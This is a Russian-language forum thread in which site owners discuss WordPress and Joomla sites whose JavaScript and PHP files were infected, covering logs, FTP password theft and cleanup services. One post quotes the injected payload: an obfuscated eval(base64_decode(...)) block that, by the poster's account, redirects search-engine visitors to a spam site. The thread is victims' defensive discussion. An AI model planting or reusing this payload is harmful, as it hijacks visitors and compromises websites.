Javascript-вирус?

Ага, как же. Поставил для теста wordpress 3.3.1, сайт нигде не светился, через пару дней все js файлы оказались заражены. Ковырялся с плагинами NextGEN Gallery, wp-shop, e-shop, wp-Table Reloaded, подозрение на дыру в последнем

В логах апача есть такое:

[Thu Mar 29 16:08:23 2012] [error] [client 62.109.23.137] File does not exist: /home/XXX/YYY.ru/www/bitrix

[Sun Apr 01 08:01:02 2012] [error] [client 95.32.21.87] File does not exist: /home/XXX/YYY.ru/www/administrator

Разве Clamav проверет файлы на сервере? Он, ИМХО, тольк почтовые потоки фильтрует... или ошибаюсь?

Нет, почему же. Как раз таки шеллы прекрасно находит, не все конечно разновидности, но всё же.:)

Нашел сервис мониторинга сайтов на вирусы и трояны, который к тому же и осуществляет чистку обнаруженных угроз. Есть еще подобные?

P.S. Последнее, что обнаружилось на моих сайтах - JS/Agent.NEK. На форуме Касперского пишут, что он передается только по ФТП с зараженного компьютера :(

makabra, есть еще nazamok.com, на серче даже тема есть.

по поводу других изменений в файлах вряд ли.

у меня уже второй раз .js заражаются, вне зависимости от движка

изменения по дате в других файлах не найдено

логи смотрел чистые.

пользовался cute ftp

сейчас его снес, изменил все пароли и поставил core ftp

посмотрю что будет

P.S. комп тоже проверял-все чисто

вопрос в догонку был бекап папки, поймал одноименные вирусы сожравшие вернее дописавшие свой код в каждый js файл, перекинул папку с заменой она была более мене свежая (за апрель) но теперь контент не работает. Сам сайт narsana.info еще на верху в левом углу пишет Array, такое ощущение как будто тег где то незакрыт, но это исключено, в main.tpl все чисто, вот думаю что база полетела???

ребят зарегистрировался здесь, хочу сказать что похожий вирус атаковал меня 27 числа (вчера) - CMS Joomla 1.5.2x, tiny удалил еще давно, после первой атаки подобного вируса, так что не из-за него, подозрения падают на кеш браузера Опера (там в единственном месте был сохранен пароль от админки сайта и панели хостинга), либо конечно дыра в CMS, кстати забыл сказать что первый раз был атакован вашим вирусом, который заразил все JS, помогла замена из бекапа, в этот раз вирус атаковал все файлы php, в начало прописан код вида:

<?php          

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciw2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

Результат один и тот же , при прямом заходе на зараженные сайты (кстати сайтов два, на этом хостинге, оба на джумле, оба версия 1.5.2*) - всё нормально, при заходе через поисковик - кидает на сайт minkof.sellclassics.com

Пугает то что уже второй раз эти сайты заражает, кстати один из них только недавно перенес на этот хостинг, до этого он заражался на другом хостинге. Настораживает:

1) массовость

2) 27 число

3) разные системы управления сайтом, от самописных, до обычных цмс.

4) атакует не из-за паролей в тотал командере, после прошлого раза сменил всё и не сохранял

5) Cpanel мб?

после того как потсроили догадки, надо все их проверить

смотрите файл когда был изменен, смотрите в логах веб-сервера что приосходило по FTP и по HTTP

и получаете, либо файл менялся по FTP

тогда уж точно пароль был украден

если по HTTP То либо через админку CMS либо через веб-шел который залит где-нибудь

забыл сказать про насторожения по поводу вируса, заражающего кеш оперы, после полной проверки компа авастом 26! числа, вот результат:

проверить не могу когда и с чего заход был, не могу зайти ни на фтп, ни в панель, либо я дурак, либо пароли сменили в Cpanel, там как раз меняется сразу и от панели и от фтп. Проверить точно это не могу, т.к. в отпуске, а листок с паролем на работе, но я его знаю наизусть и всегда вводил вручную, в общем что-то здесь не так.